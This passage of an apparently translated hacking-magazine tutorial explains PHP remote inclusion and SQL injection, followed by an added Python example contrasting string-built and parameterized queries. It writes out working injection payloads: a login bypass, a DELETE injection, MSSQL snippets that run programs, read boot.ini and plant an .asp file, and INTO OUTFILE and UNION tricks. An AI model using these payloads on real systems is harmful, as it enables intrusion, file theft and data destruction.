13.07.2015

этом - Xakep Online


PHP

Having created such a file on our own server, we simply include it in the request instead of about.php and see all the information on the screen. So we have injected arbitrary code into a script on the server and obtained the information we needed. But that is only the beginning: with PHP you can do whatever your heart desires.

After writing the example above, I wondered whether it was too contrived and went to Google. Imagine my surprise when, for the corresponding search, 3 of the top ten sites turned out to be vulnerable. Truly a day of discoveries ;).

SQL Injection. On to the second course: instead of borscht we have SQL injection. Long, long ago, when dinosaurs still roamed the earth, web programmers stored their data in text files. Then, once man had invented the wheel, web developers came up with databases and started keeping everything in them. And everyone was happy: you can stuff the user list in there, and put all the site's documents in there too. But one day a certain tinkerer accidentally typed an apostrophe into a form, and the script spat out an SQL error. The tinkerer read the message, thought a bit, and instead of the apostrophe entered ' OR '1'='1, fiddled a little more and has been administrator ever since. That was the end of the site; well done to those who got it, and for those who didn't, let me explain ;).

[Figure: SQL injection scheme. Attacker's SQL code; query to the database; poor filtering of input for SQL operators.]

Work with the database is done in SQL. For example, to check that a user exists, you can run this query on the login:

    SELECT * FROM users WHERE username='$username'

Now substitute an apostrophe or ' OR '1'='1 into the query and see what you get.

[Figure: cross-site scripting scheme. Attacker's JavaScript; poor JavaScript filtering; the page that will be shown to the user.]

In effect, we can execute an arbitrary SQL query, and something nasty may happen:

    '; DELETE FROM customers WHERE 1 or username = '

Sidebar (1). MSSQL injection snippets for ActiveX, from "Advanced SQL Injection In SQL Server Applications":

Launching Notepad:

    declare @o int
    exec sp_oacreate 'wscript.shell', @o out
    exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

[Viewing the boot.ini file]

    declare @o int, @f int, @t int, @ret int
    declare @line varchar(8000)
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
    exec @ret = sp_oamethod @f, 'readline', @line out
    while( @ret = 0 )
    begin
        print @line
        exec @ret = sp_oamethod @f, 'readline', @line out
    end

Getting a shell:

    declare @o int, @f int, @t int, @ret int
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
    exec @ret = sp_oamethod @f, 'writeline', NULL,''

[The server announces that it has been taken over]

    declare @o int, @ret int
    exec sp_oacreate 'speech.voicetext', @o out
    exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
    exec sp_oasetproperty @o, 'speed', 150
    exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528
    waitfor delay '00:00:05'

I want to throw in a couple more good ideas on how an SQL injection can be used. For that we will look at the details of the SQL dialects of different vendors. Let's start with MySQL, which does something I never expected of it ;). The problem is simple: if a SELECT query is injectable, it does not follow that its result will be shown on screen. But read the MySQL manual carefully and you find a wonderful feature: the result of a query can be redirected into a file!

    SELECT FROM INTO OUTFILE '';

Now all that remains is to find a directory that will give us shelter. With a CMS this is usually easy: there is almost always an upload directory for file uploads. That is exactly the directory the output should be redirected to.

Starting with version four, MySQL supports combining queries with the UNION command. That way, additional information from an arbitrary table can be output. Let's see what this looks like in an example:

    SELECT title, description FROM articles WHERE id='$id';

title and description are of type varchar, so $id must be given a value such that, after substitution, the following query results:

    SELECT title, description FROM articles WHERE id='123123'
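The login query and the ' OR '1'='1 bypass described above, as an added example that is not from the article: the query built by string substitution (as the PHP "$username" version does) is run next to a parameterized version, so you can see why the bound parameter is the fix. sqlite3 stands in for the MySQL/MSSQL back-ends, and the users table and its rows are constructed for the demo.

```python
import sqlite3

def make_db():
    # Constructed in-memory sample database (not from the article) with the
    # users table that the article's login query runs against.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    return conn

def find_user_vulnerable(conn, username):
    # The article's query, assembled by string substitution exactly as
    # "WHERE username='$username'" is in the PHP original: whatever the
    # user typed becomes part of the SQL text.
    sql = "SELECT * FROM users WHERE username='%s'" % username
    return conn.execute(sql).fetchall()

def find_user_safe(conn, username):
    # Same query with a bound parameter: the value travels separately from
    # the statement, so quotes inside it are data, never SQL syntax.
    sql = "SELECT * FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchall()

PAYLOAD = "' OR '1'='1"   # the bypass string from the article

def apostrophe_raises_error(conn):
    # The article's first hint: a lone apostrophe unbalances the quotes and
    # the database answers with a syntax error instead of a result.
    try:
        find_user_vulnerable(conn, "'")
    except sqlite3.Error:
        return True
    return False

def demo():
    # Row counts for a normal login and for the payload, both ways.
    conn = make_db()
    return {
        "vulnerable_normal": len(find_user_vulnerable(conn, "alice")),
        "vulnerable_payload": len(find_user_vulnerable(conn, PAYLOAD)),  # every user
        "safe_normal": len(find_user_safe(conn, "alice")),
        "safe_payload": len(find_user_safe(conn, PAYLOAD)),              # nobody
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the payload the vulnerable query becomes WHERE username='' OR '1'='1', which is true for every row; the parameterized query looks for a user literally named ' OR '1'='1 and finds none.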
